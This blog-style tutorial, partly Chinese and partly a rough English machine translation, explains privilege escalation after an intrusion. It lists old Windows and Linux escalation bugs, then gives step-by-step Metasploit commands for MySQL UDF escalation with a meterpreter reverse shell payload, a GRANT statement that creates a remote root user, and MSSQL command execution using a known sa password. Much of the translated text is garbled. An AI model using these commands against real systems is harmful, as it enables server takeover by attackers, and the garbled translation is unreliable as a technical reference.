最近有小老弟问我，总有面试官问关于提权的问题，总是能把我难住。好吧，面试造航母干活 拧螺丝这句话在哪里都很实用，索性今天也就写一下我认为的提权。 首先呢，其实权限提升这种事情多用于内网渗透，这里指的内网渗透当然不是你处于内网环境的渗透测试，而是那种在攻防演练、护网、打击境外的一些特殊场景，由外网入侵到内网做后渗透的时候遇到的权限提升问题。（大佬勿喷，我实在想不到还有哪里做提权，正常安全评估是完全用不到这一项技能的，毕竟传统工艺点到为止）
What is escalation
It is mainly aimed at increasing the current authority by exploiting the loopholes in the website or server system during the infiltration of the website, so that we can have the highest authority of the server.
Two ways to escalate rights
System vulnerability escalation
Linux Kernel <= 2.6.37 Local Privilege Escalation
System privilege escalation ms09-12 case (Pr.exe (KB952004))
Windows tracking registry ACL permissions Escalation Vulnerability
MS09-012: Churrasco (KB956572) Barbecue
Windows Tracking Registry ACL Privilege Escalation Vulnerability
Privilege Escalation Vulnerability Linux Kernel <= 2.6.37 There
are so many cases of Local Privilege Escalation , here we use windows server Take the right escalation as an example. Since there are so many horses, how should it be used in real scenarios?
systeminfo command can get system information, including which patches
have been applied to open the online website, and identify which privilege escalation vulnerabilities are available for use.
will get you Copy the patch information to the website, you can get the detailed information about the use of the right-elevating horse.
There is also a guy who asked me, this is too much trouble, is there a way to output the systeminfo information to a file, and then use an automated tool for local identification
Here I just talk about how to print the output of the command to the txt directory, it's actually very simple
systeminfo > 目录/文件名
is nothing to say about system privilege escalation. It's another matter for the manual boss. The defects of using this kind of thing are also obvious, because this kind of privilege escalation Trojan horse is inevitable. If there is a firewall and anti-software on the opposite side, it is sorrowful and concealed. It’s just for learning, don’t die, don’t take me when you die
Third-party software right escalation
What does third-party software mean, that is, some tool installations will automatically create an account with administrator privileges. We can use this mechanism to perform a privilege escalation
Serv-U (Port 43958)
VNC privilege escalation
SQL Server SA
However, it is obvious that some things are no longer suitable for the current environment, and the technology has been updated. So here are examples I have encountered, which are well-known mysql-udf privilege escalation, mssql privilege escalation
MySql-UDF right escalation
The exploit/multi/mysql/mysql_udf_payload module in MSF can also be used for UDF privilege escalation. MSF will write the dll file into the lib\plugin\ directory (the premise is that the directory exists, if the directory does not exist, the execution cannot be successful), the dll file name is an arbitrary created name. The dll file contains two functions sys_exec() and sys_eval(), but only the sys_exec() function is created by default, and there will be no echo when the function is executed. We can manually create the sys_eval() function to execute commands with echo.
1. The user has the permission to log in remotely
2. Know the user name and password
What if the user does not have the remote login permission, of course, is to find a way to log in to his database and create one manually
- Log in and test the target machine to create a remote access user
Enter the sql statement grant all privileges on . To'root'@'%' identified by '123456' with grant option; Create a remote connection user, as shown in Figure 1
grant all privileges on *.* to 'root'@'%' identified by '123456' with grant option;
2. Use kili, msfconsloe, enter search mysql_udf_payload as shown in Figure 2
3. use exploit/multi/mysql/mysql_udf_payload, use, as shown in Figure 3
4. show payload, view available payloads, as shown in Figure 4
5. Set payload, set payload windows/ meterpreter/reverse_http, as shown in Figure 5
6. Set the database user name, password, ip address and listening port set rhosts; set username; set password; set lport, as shown in Figure 6
small experiment verification
Use Navicat graphical tool to log in to the account Execute the command
select sys_exec('whoami'); //Execute the system command, msf creates sys_exec by default without echo, and returns 0 for success
create function sys_eval returns string soname'wsODEVzX.dll'; //Manually create an echoed function, The following .dll files are randomly generated and can be seen directly in Kili
select sys_eval('whoami'); execute once, as shown in Figure 9
Mssql privilege escalation
Known sa (default) user, the password is rising00.00!123, to perform mssql privilege
escalation Use msfconsole, enter the following command
search mssql use uxiliary/admin/mssql/mssql_exec set rhosts 10.10.59.247 set password rising00.00!123 set cmd whoami Show options exploit
There are not many scenarios for me to escalate rights. In general, system rights escalation are used. In fact, the conditions for escalating rights of third-party components of the database are very harsh.